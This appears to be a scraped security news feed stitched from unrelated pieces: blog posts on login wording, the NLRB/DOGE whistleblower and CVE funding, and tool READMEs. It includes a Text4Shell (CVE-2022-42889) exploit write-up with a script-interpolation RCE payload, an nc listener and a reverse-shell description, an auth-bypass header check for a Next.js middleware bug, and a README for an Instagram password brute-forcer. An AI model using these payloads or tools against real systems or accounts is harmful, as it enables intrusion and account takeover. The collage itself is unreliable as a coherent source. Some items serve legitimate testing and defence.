
📝 Version History

  • v1.0.0 (2024-01) - Initial release
  • v1.1.0 (2024-02) - Added tracking modules
  • v1.2.0 (2024-03) - Added tool installer

👥 Contributing

This is a proprietary project and contributions are not accepted at this time.

🤝 Support

For support, please email muhammadsobrimaulana31@gmail.com or visit https://lynk.id/muhsobrimaulana

⚖️ License

This project is protected under proprietary license. See the LICENSE file for details.

Made with ❤️ by Letda Kes dr. Sobri



You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)


How do seemingly little things manage to consume so much time?! We had a suggestion this week that instead of being able to login to the new HIBP website, you should instead be able to log in. This initially confused me because I've been used to logging on to things for decades:


So, I went and signed in (yep, different again) to X and asked the masses what the correct term was:

When accessing your @haveibeenpwned dashboard, which of the following should you do? Preview screen for reference: https://t.co/9gqfr8hZrY

— Troy Hunt (@troyhunt) April 23, 2025

Which didn't result in a conclusive victor, so I started browsing around.

Cloudflare's Zero Trust docs contain information about customising the login page, which I assume you can do once you log in:


Another, uh, "popular" site prompts you to log in:


After which you're invited to sign in:


You can log in to Canva, which is clearly indicated by the HTML title, which suggests you're on the login page:


You can log on to the Commonwealth Bank down here in Australia:


But the login page for ANZ bank requires you to log in, unless you've forgotten your login details:


Ah, but many of these are just the difference between the noun "login" (the page is a thing) and the verb "log in" (when you perform an action), right? Well... depends who you bank with 🤷‍♂️


And maybe you don't log in or login at all:


Finally, from the darkness of seemingly interchangeable terms that may or may not violate principles of English language, emerged a pattern. You also sign in to Google:


And Microsoft:


And Amazon:


And Yahoo:


And, as I mentioned earlier, X:


And now, Have I Been Pwned:


There are some notable exceptions (Facebook and ChatGPT, for example), but "sign in" did emerge as the frontrunner among the world's most popular sites. If I really start to overthink it, I do feel that "log[whatever]" implies something different to why we authenticate to systems today and is more a remnant of a bygone era. But frankly, that argument is probably no more valid than whether you're doing a verb thing or a noun thing.

Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

By: Unknown


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a listener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell is sent via /data parameter using a POST request.
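As an illustration only, here is a minimal sketch of how such a request could be assembled with Python's requests library against a target you are authorized to test. The endpoint URL and parameter name are assumptions (they vary per application, as noted above), and the injected command here is a harmless `id` rather than a reverse shell:

import requests

# Hypothetical vulnerable endpoint; adjust the path and parameter name to the target application
target = "http://127.0.0.1:8080/data"

# Same ${script:...} interpolation shown above, with a harmless command for demonstration
payload = "${script:javascript:java.lang.Runtime.getRuntime().exec('id')}"

# The PoC described above delivers the payload via the `data` parameter in a POST request
response = requests.post(target, data={"data": payload}, timeout=10)
print(response.status_code, response.text[:200])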



Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)

By: Unknown


A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).

The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by sending a custom header, x-middleware-subrequest.

Next JS versions affected: - 11.1.4 and up

[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.
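For context, the check a script like this performs boils down to comparing responses with and without the header. Below is a minimal sketch (not the ghost-route script itself); the header value shown is one commonly cited variant and the exact value required varies by Next.js version, and the URL and path are placeholders for a site you are authorized to test:

import requests

BASE_URL = "https://example.com"   # placeholder target
PATH = "/admin"                    # protected path to test

# Response without the header; middleware should normally block or redirect this
baseline = requests.get(BASE_URL + PATH, allow_redirects=False, timeout=10)

# Response with the x-middleware-subrequest header (assumed bypass value; version-dependent)
bypass = requests.get(
    BASE_URL + PATH,
    headers={"x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"},
    allow_redirects=False,
    timeout=10,
)

# If the baseline is blocked (e.g. 302/401/403) but the header yields a 200, the site is likely vulnerable
print("baseline:", baseline.status_code, "| with header:", bypass.status_code)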

 

Installation

Clone the repo

git clone https://github.com/takumade/ghost-route.git
cd ghost-route

Create and activate virtual environment

python -m venv .venv
source .venv/bin/activate

Install dependencies

pip install -r requirements.txt

Usage

python ghost-route.py <url> <path> <show_headers>
  • <url>: Base URL of the Next.js site (e.g., https://example.com)
  • <path>: Protected path to test (default: /admin)
  • <show_headers>: Show response headers (default: False)

Example

Basic Example

python ghost-route.py https://example.com /admin

Show Response Headers

python ghost-route.py https://example.com /admin True

License

MIT License

Credits



Whistleblower: DOGE Siphoned NLRB Case Data

A security architect with the National Labor Relations Board (NLRB) alleges that employees from Elon Musk‘s Department of Government Efficiency (DOGE) transferred gigabytes of sensitive data from agency case files in early March, using short-lived accounts configured to leave few traces of network activity. The NLRB whistleblower said the unusually large data outflows coincided with multiple blocked login attempts from an Internet address in Russia that tried to use valid credentials for a newly-created DOGE user account.

The cover letter from Berulis’s whistleblower statement, sent to the leaders of the Senate Select Committee on Intelligence.

The allegations came in an April 14 letter to the Senate Select Committee on Intelligence, signed by Daniel J. Berulis, a 38-year-old security architect at the NLRB.

NPR, which was the first to report on Berulis’s whistleblower complaint, says NLRB is a small, independent federal agency that investigates and adjudicates complaints about unfair labor practices, and stores “reams of potentially sensitive data, from confidential information about employees who want to form unions to proprietary business information.”

The complaint documents a one-month period beginning March 3, during which DOGE officials reportedly demanded the creation of all-powerful “tenant admin” accounts in NLRB systems that were to be exempted from network logging activity that would otherwise keep a detailed record of all actions taken by those accounts.

Berulis said the new DOGE accounts had unrestricted permission to read, copy, and alter information contained in NLRB databases. The new accounts also could restrict log visibility, delay retention, route logs elsewhere, or even remove them entirely — top-tier user privileges that neither Berulis nor his boss possessed.

Berulis writes that on March 3, a black SUV accompanied by a police escort arrived at his building — the NLRB headquarters in Southeast Washington, D.C. The DOGE staffers did not speak with Berulis or anyone else in NLRB’s IT staff, but instead met with the agency leadership.

“Our acting chief information officer told us not to adhere to standard operating procedure with the DOGE account creation, and there was to be no logs or records made of the accounts created for DOGE employees, who required the highest level of access,” Berulis wrote of their instructions after that meeting.

“We have built in roles that auditors can use and have used extensively in the past but would not give the ability to make changes or access subsystems without approval,” he continued. “The suggestion that they use these accounts was not open to discussion.”

Berulis found that on March 3 one of the DOGE accounts created an opaque, virtual environment known as a “container,” which can be used to build and run programs or scripts without revealing its activities to the rest of the world. Berulis said the container caught his attention because he polled his colleagues and found none of them had ever used containers within the NLRB network.

Berulis said he also noticed that early the next morning — between approximately 3 a.m. and 4 a.m. EST on Tuesday, March 4  — there was a large increase in outgoing traffic from the agency. He said it took several days of investigating with his colleagues to determine that one of the new accounts had transferred approximately 10 gigabytes worth of data from the NLRB’s NxGen case management system.

Berulis said neither he nor his co-workers had the necessary network access rights to review which files were touched or transferred — or even where they went. But his complaint notes the NxGen database contains sensitive information on unions, ongoing legal cases, and corporate secrets.

“I also don’t know if the data was only 10gb in total or whether or not they were consolidated and compressed prior,” Berulis told the senators. “This opens up the possibility that even more data was exfiltrated. Regardless, that kind of spike is extremely unusual because data almost never directly leaves NLRB’s databases.”

Berulis said he and his colleagues grew even more alarmed when they noticed nearly two dozen login attempts from a Russian Internet address (83.149.30.186) that presented valid login credentials for a DOGE employee account — one that had been created just minutes earlier. Berulis said those attempts were all blocked thanks to rules in place that prohibit logins from non-U.S. locations.

“Whoever was attempting to log in was using one of the newly created accounts that were used in the other DOGE related activities and it appeared they had the correct username and password due to the authentication flow only stopping them due to our no-out-of-country logins policy activating,” Berulis wrote. “There were more than 20 such attempts, and what is particularly concerning is that many of these login attempts occurred within 15 minutes of the accounts being created by DOGE engineers.”

According to Berulis, the naming structure of one Microsoft user account connected to the suspicious activity suggested it had been created and later deleted for DOGE use in the NLRB’s cloud systems: “DogeSA_2d5c3e0446f9@nlrb.microsoft.com.” He also found other new Microsoft cloud administrator accounts with nonstandard usernames, including “Whitesox, Chicago M.” and “Dancehall, Jamaica R.”

A screenshot shared by Berulis showing the suspicious user accounts.

On March 5, Berulis documented that a large section of logs for recently created network resources were missing, and a network watcher in Microsoft Azure was set to the “off” state, meaning it was no longer collecting and recording data like it should have.

Berulis said he discovered someone had downloaded three external code libraries from GitHub that neither NLRB nor its contractors ever use. A “readme” file in one of the code bundles explained it was created to rotate connections through a large pool of cloud Internet addresses that serve “as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.” Brute force attacks involve automated login attempts that try many credential combinations in rapid sequence.

The complaint alleges that by March 17 it became clear the NLRB no longer had the resources or network access needed to fully investigate the odd activity from the DOGE accounts, and that on March 24, the agency’s associate chief information officer had agreed the matter should be reported to US-CERT. Operated by the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA), US-CERT provides on-site cyber incident response capabilities to federal and state agencies.

But Berulis said that between April 3 and 4, he and the associate CIO were informed that “instructions had come down to drop the US-CERT reporting and investigation and we were directed not to move forward or create an official report.” Berulis said it was at this point he decided to go public with his findings.

An email from Daniel Berulis to his colleagues dated March 28, referencing the unexplained traffic spike earlier in the month and the unauthorized changing of security controls for user accounts.

Tim Bearese, the NLRB’s acting press secretary, told NPR that DOGE neither requested nor received access to its systems, and that “the agency conducted an investigation after Berulis raised his concerns but ‘determined that no breach of agency systems occurred.'” The NLRB did not respond to questions from KrebsOnSecurity.

Nevertheless, Berulis has shared a number of supporting screenshots showing agency email discussions about the unexplained account activity attributed to the DOGE accounts, as well as NLRB security alerts from Microsoft about network anomalies observed during the timeframes described.

As CNN reported last month, the NLRB has been effectively hobbled since President Trump fired three board members, leaving the agency without the quorum it needs to function.

“Despite its limitations, the agency had become a thorn in the side of some of the richest and most powerful people in the nation — notably Elon Musk, Trump’s key supporter both financially and arguably politically,” CNN wrote.

Both Amazon and Musk’s SpaceX have been suing the NLRB over complaints the agency filed in disputes about workers’ rights and union organizing, arguing that the NLRB’s very existence is unconstitutional. On March 5, a U.S. appeals court unanimously rejected Musk’s claim that the NLRB’s structure somehow violates the Constitution.

Berulis shared screenshots with KrebsOnSecurity showing that on the day NPR published its story about his claims (April 14), the deputy CIO at NLRB sent an email stating that administrative control had been removed from all employee accounts. Meaning, suddenly none of the IT employees at the agency could do their jobs properly anymore, Berulis said.

An email from the NLRB’s associate chief information officer Eric Marks, notifying employees they will lose security administrator privileges.

Berulis shared a screenshot of an agency-wide email dated April 16 from NLRB director Lasharn Hamilton saying DOGE officials had requested a meeting, and reiterating claims that the agency had no prior “official” contact with any DOGE personnel. The message informed NLRB employees that two DOGE representatives would be detailed to the agency part-time for several months.

An email from the NLRB Director Lasharn Hamilton on April 16, stating that the agency previously had no contact with DOGE personnel.

Berulis told KrebsOnSecurity he was in the process of filing a support ticket with Microsoft to request more information about the DOGE accounts when his network administrator access was restricted. Now, he’s hoping lawmakers will ask Microsoft to provide more information about what really happened with the accounts.

“That would give us way more insight,” he said. “Microsoft has to be able to see the picture better than we can. That’s my goal, anyway.”

Berulis’s attorney told lawmakers that on April 7, while his client and legal team were preparing the whistleblower complaint, someone physically taped a threatening note to Mr. Berulis’s home door with photographs — taken via drone — of him walking in his neighborhood.

“The threatening note made clear reference to this very disclosure he was preparing for you, as the proper oversight authority,” reads a preface by Berulis’s attorney Andrew P. Bakaj. “While we do not know specifically who did this, we can only speculate that it involved someone with the ability to access NLRB systems.”

Berulis said the response from friends, colleagues and even the public has been largely supportive, and that he doesn’t regret his decision to come forward.

“I didn’t expect the letter on my door or the pushback from [agency] leaders,” he said. “If I had to do it over, would I do it again? Yes, because it wasn’t really even a choice the first time.”

For now, Mr. Berulis is taking some paid family leave from the NLRB. Which is just as well, he said, considering he was stripped of the tools needed to do his job at the agency.

“They came in and took full administrative control and locked everyone out, and said limited permission will be assigned on a need basis going forward,” Berulis said of the DOGE employees. “We can’t really do anything, so we’re literally getting paid to count ceiling tiles.”

Further reading: Berulis’s complaint (PDF).

TruffleHog Explorer - A User-Friendly Web-Based Tool To Visualize And Analyze Data Extracted Using TruffleHog

By: Unknown


Welcome to TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful open source tools for secrets discovery, classification, validation, and analysis. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.

With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.

⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.

You can use the online version here: TruffleHog Explorer


🚀 Features

  • Intuitive UI/UX: Beautiful pastel theme with smooth navigation.
  • Powerful Filtering:
  • Filter findings by repository, detector type, and uploaded file.
  • Flexible date range selection with a calendar picker.
  • Verification status categorization for effective review.
  • Advanced search capabilities for faster identification.
  • Batch Operations:
  • Verify or reject multiple findings with a single click.
  • Toggle visibility of rejected results for a streamlined view.
  • Bulk processing to manage large datasets efficiently.
  • Export Capabilities:
  • Export verified secrets or filtered findings effortlessly.
  • Save and load session backups for continuity.
  • Generate reports in multiple formats (JSON, CSV).
  • Dynamic Sorting:
  • Sort results by repository, date, or verification status.
  • Customizable sorting preferences for a personalized experience.

📥 Installation & Usage

1. Clone the Repository

$ git clone https://github.com/yourusername/trufflehog-explorer.git
$ cd trufflehog-explorer

2. Open the index.html

Simply open the index.html file in your preferred web browser.

$ open index.html

📂 How to Use

  1. Upload TruffleHog JSON Findings:
     • Click on the "Load Data" section and select your .json files from TruffleHog output.
     • Multiple files are supported.
  2. Apply Filters:
     • Choose filters such as repository, detector type, and verification status.
     • Utilize the date range picker to narrow down findings.
     • Leverage the search function to locate specific findings quickly.
  3. Review Findings:
     • Click on a finding to expand and view its details.
     • Use the action buttons to verify or reject findings.
     • Add comments and annotations for better tracking.
  4. Export Results:
     • Export verified or filtered findings for reporting.
     • Save session data for future review and analysis.
  5. Save Your Progress:
     • Save your session and resume later without losing any progress.
     • Automatic backup feature to prevent data loss.

Happy Securing! 🔒



The Need for a Strong CVE Program

The CVE program is the foundation for standardized vulnerability disclosure and management. With its future uncertain, global organizations face challenges.

Wappalyzer-Next - Python library that uses Wappalyzer extension (and its fingerprints) to detect technologies

By: Unknown


This project is a command line tool and Python library that uses the Wappalyzer extension (and its fingerprints) to detect technologies. Other projects that emerged after the discontinuation of the official open source project use outdated fingerprints and lack accuracy when used on dynamic web apps; this project bypasses those limitations.


Installation

Before installing wappalyzer, you will need to install Firefox and geckodriver. Below are detailed steps for setting up geckodriver, but you may use Google/YouTube for help.

Setting up geckodriver

Step 1: Download GeckoDriver

  1. Visit the official GeckoDriver releases page on GitHub:
    https://github.com/mozilla/geckodriver/releases
  2. Download the version compatible with your system:
  3. For Windows: geckodriver-vX.XX.X-win64.zip
  4. For macOS: geckodriver-vX.XX.X-macos.tar.gz
  5. For Linux: geckodriver-vX.XX.X-linux64.tar.gz
  6. Extract the downloaded file to a folder of your choice.

Step 2: Add GeckoDriver to the System Path

To ensure Selenium can locate the GeckoDriver executable:

Windows:
  1. Move geckodriver.exe to a directory (e.g., C:\WebDrivers\).
  2. Add this directory to the system's PATH:
     • Open Environment Variables.
     • Under System Variables, find and select the Path variable, then click Edit.
     • Click New and enter the directory path where geckodriver.exe is stored.
     • Click OK to save.

macOS/Linux:
  1. Move the geckodriver file to /usr/local/bin/ or another directory in your PATH.
  2. Use the following command in the terminal:
sudo mv geckodriver /usr/local/bin/
     Ensure /usr/local/bin/ is in your PATH.

Install as a command-line tool

pipx install wappalyzer

Install as a library

To use it as a library, install it with pip inside an isolated environment, e.g. a venv or Docker. You may also use --break-system-packages to do a 'regular' install, but it is not recommended.

Install with docker

Steps

  1. Clone the repository:
git clone https://github.com/s0md3v/wappalyzer-next.git
cd wappalyzer-next
  2. Build and run with Docker Compose:
docker compose up -d
  3. To scan URLs using the Docker container:
  • Scan a single URL:
docker compose run --rm wappalyzer -i https://example.com
  • Scan multiple URLs from a file:
docker compose run --rm wappalyzer -i https://example.com -oJ output.json

For Users

Some common usage examples are given below, refer to list of all options for more information.

  • Scan a single URL: wappalyzer -i https://example.com
  • Scan multiple URLs from a file: wappalyzer -i urls.txt -t 10
  • Scan with authentication: wappalyzer -i https://example.com -c "sessionid=abc123; token=xyz789"
  • Export results to JSON: wappalyzer -i https://example.com -oJ results.json

Options

Note: For accuracy use 'full' scan type (default). 'fast' and 'balanced' do not use browser emulation.

  • -i: Input URL or file containing URLs (one per line)
  • --scan-type: Scan type (default: 'full')
  • fast: Quick HTTP-based scan (sends 1 request)
  • balanced: HTTP-based scan with more requests
  • full: Complete scan using wappalyzer extension
  • -t, --threads: Number of concurrent threads (default: 5)
  • -oJ: JSON output file path
  • -oC: CSV output file path
  • -oH: HTML output file path
  • -c, --cookie: Cookie header string for authenticated scans

For Developers

The Python library is available on PyPI as wappalyzer and can be imported with the same name.

Using the Library

The main function you'll interact with is analyze():

from wappalyzer import analyze

# Basic usage
results = analyze('https://example.com')

# With options
results = analyze(
    url='https://example.com',
    scan_type='full',  # 'fast', 'balanced', or 'full'
    threads=3,
    cookie='sessionid=abc123'
)

analyze() Function Parameters

  • url (str): The URL to analyze
  • scan_type (str, optional): Type of scan to perform
  • 'fast': Quick HTTP-based scan
  • 'balanced': HTTP-based scan with more requests
  • 'full': Complete scan including JavaScript execution (default)
  • threads (int, optional): Number of threads for parallel processing (default: 3)
  • cookie (str, optional): Cookie header string for authenticated scans

Return Value

Returns a dictionary with the URL as key and detected technologies as value:

{
    "https://github.com": {
        "Amazon S3": {"version": "", "confidence": 100, "categories": ["CDN"], "groups": ["Servers"]},
        "lit-html": {"version": "1.1.2", "confidence": 100, "categories": ["JavaScript libraries"], "groups": ["Web development"]},
        "React Router": {"version": "6", "confidence": 100, "categories": ["JavaScript frameworks"], "groups": ["Web development"]}
    },
    "https://google.com": {},
    "https://example.com": {}
}
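For example, a small usage sketch that walks the dictionary shape shown above (the URL is a placeholder):

from wappalyzer import analyze

results = analyze('https://example.com', scan_type='fast')
for url, technologies in results.items():
    for name, details in technologies.items():
        version = details.get('version') or 'unknown version'
        categories = ', '.join(details.get('categories', []))
        print(f"{url}: {name} ({version}) - {categories}")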

FAQ

Why use Firefox instead of Chrome?

Firefox extensions are .xpi files which are essentially zip files. This makes it easier to extract data and slightly modify the extension to make this tool work.

What is the difference between 'fast', 'balanced', and 'full' scan types?

  • fast: Sends a single HTTP request to the URL. Doesn't use the extension.
  • balanced: Sends additional HTTP requests to .js files and /robots.txt, and does DNS queries. Doesn't use the extension.
  • full: Uses the official Wappalyzer extension to scan the URL in a headless browser.


Funding Expires for Key Cyber Vulnerability Database

A critical resource that cybersecurity professionals worldwide rely on to identify, mitigate and fix security vulnerabilities in software and hardware is in danger of breaking down. The federally funded, non-profit research and development organization MITRE warned today that its contract to maintain the Common Vulnerabilities and Exposures (CVE) program — which is traditionally funded each year by the Department of Homeland Security — expires on April 16.

A letter from MITRE vice president Yosry Barsoum, warning that the funding for the CVE program will expire on April 16, 2025.

Tens of thousands of security flaws in software are found and reported every year, and these vulnerabilities are eventually assigned their own unique CVE tracking number (e.g. CVE-2024-43573, which is a Microsoft Windows bug that Redmond patched last year).

There are hundreds of organizations — known as CVE Numbering Authorities (CNAs) — that are authorized by MITRE to bestow these CVE numbers on newly reported flaws. Many of these CNAs are country and government-specific, or tied to individual software vendors or vulnerability disclosure platforms (a.k.a. bug bounty programs).

Put simply, MITRE is a critical, widely-used resource for centralizing and standardizing information on software vulnerabilities. That means the pipeline of information it supplies is plugged into an array of cybersecurity tools and services that help organizations identify and patch security holes — ideally before malware or malcontents can wriggle through them.
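
To illustrate how that pipeline is typically consumed, here is a rough sketch that looks up a single CVE identifier against NIST's National Vulnerability Database, which republishes CVE records (the endpoint and response field names are assumptions based on the public NVD CVE API 2.0, not details from this article):

import requests

CVE_ID = "CVE-2024-43573"  # the Windows bug cited above

# Assumed NVD CVE API 2.0 lookup by identifier; the response layout may differ.
resp = requests.get(
    "https://services.nvd.nist.gov/rest/json/cves/2.0",
    params={"cveId": CVE_ID},
    timeout=30,
)
resp.raise_for_status()

for item in resp.json().get("vulnerabilities", []):
    cve = item.get("cve", {})
    descriptions = cve.get("descriptions", [])
    summary = descriptions[0]["value"] if descriptions else "(no description)"
    print(cve.get("id"), "-", summary)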

“What the CVE lists really provide is a standardized way to describe the severity of that defect, and a centralized repository listing which versions of which products are defective and need to be updated,” said Matt Tait, chief operating officer of Corellium, a cybersecurity firm that sells phone-virtualization software for finding security flaws.

In a letter sent today to the CVE board, MITRE Vice President Yosry Barsoum warned that on April 16, 2025, “the current contracting pathway for MITRE to develop, operate and modernize CVE and several other related programs will expire.”

“If a break in service were to occur, we anticipate multiple impacts to CVE, including deterioration of national vulnerability databases and advisories, tool vendors, incident response operations, and all manner of critical infrastructure,” Barsoum wrote.

MITRE told KrebsOnSecurity the CVE website listing vulnerabilities will remain up after the funding expires, but that new CVEs won’t be added after April 16.

A representation of how a vulnerability becomes a CVE, and how that information is consumed. Image: James Berthoty, Latio Tech, via LinkedIn.

DHS officials did not immediately respond to a request for comment. The program is funded through DHS’s Cybersecurity & Infrastructure Security Agency (CISA), which is currently facing deep budget and staffing cuts by the Trump administration. The CVE contract available at USAspending.gov says the project was awarded approximately $40 million last year.

Former CISA Director Jen Easterly said the CVE program is a bit like the Dewey Decimal System, but for cybersecurity.

“It’s the global catalog that helps everyone—security teams, software vendors, researchers, governments—organize and talk about vulnerabilities using the same reference system,” Easterly said in a post on LinkedIn. “Without it, everyone is using a different catalog or no catalog at all, no one knows if they’re talking about the same problem, defenders waste precious time figuring out what’s wrong, and worst of all, threat actors take advantage of the confusion.”

John Hammond, principal security researcher at the managed security firm Huntress, told Reuters he swore out loud when he heard the news that CVE’s funding was in jeopardy, and that losing the CVE program would be like losing “the language and lingo we used to address problems in cybersecurity.”

“I really can’t help but think this is just going to hurt,” said Hammond, who posted a YouTube video to vent about the situation and alert others.

Several people close to the matter told KrebsOnSecurity this is not the first time the CVE program’s budget has been left in funding limbo until the last minute. Barsoum’s letter, which was apparently leaked, sounded a hopeful note, saying the government is making “considerable efforts to continue MITRE’s role in support of the program.”

Tait said that without the CVE program, risk managers inside companies would need to continuously monitor many other sources for information about new vulnerabilities that may jeopardize the security of their IT networks. As a result, he said, software updates may be mis-prioritized more often, leaving companies running hackable software longer than they otherwise would.

“Hopefully they will resolve this, but otherwise the list will rapidly fall out of date and stop being useful,” he said.

Update, April 16, 11:00 a.m. ET: The CVE board today announced the creation of a non-profit entity called The CVE Foundation that will continue the program’s work under a new, as-yet-unspecified funding mechanism and organizational structure.

“Since its inception, the CVE Program has operated as a U.S. government-funded initiative, with oversight and management provided under contract,” the press release reads. “While this structure has supported the program’s growth, it has also raised longstanding concerns among members of the CVE Board about the sustainability and neutrality of a globally relied-upon resource being tied to a single government sponsor.”

The organization’s website, thecvefoundation.org, is less than a day old and currently hosts no content other than the press release heralding its creation. The announcement said the foundation would release more information about its structure and transition planning in the coming days.

Update, April 16, 4:26 p.m. ET: MITRE issued a statement today saying it “identified incremental funding to keep the programs operational. We appreciate the overwhelming support for these programs that have been expressed by the global cyber community, industry and government over the last 24 hours. The government continues to make considerable efforts to support MITRE’s role in the program and MITRE remains committed to CVE and CWE as global resources.”

From Deployment to Visibility: Cisco Secure Client’s Cloud Transformation

Cisco Secure Client can now be deployed and managed via Client Management in Cisco XDR.

Instagram-Brute-Force-2024 - Instagram Brute Force 2024 Compatible With Python 3.13 / X64 Bit / Only Chrome Browser

By: Unknown


Instagram Brute Force CPU/GPU Supported 2024

(Use option 2 while running the script.)

(Option 1 is under development.)

(Chrome must be installed on the device.)

Compatible and Tested (GUI-Supported Operating Systems Only)

Python 3.13 (x64) on Unix / Linux / macOS / Windows 8.1 and higher


Install Requirements

pip install -r requirements.txt

How to run

python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161


Homeland Security Email Tells a US Citizen to ‘Immediately’ Self-Deport

An email sent by the Department of Homeland Security instructs people in the US on a temporary legal status to leave the country. But who the email actually applies to—and who actually received it—is far from clear.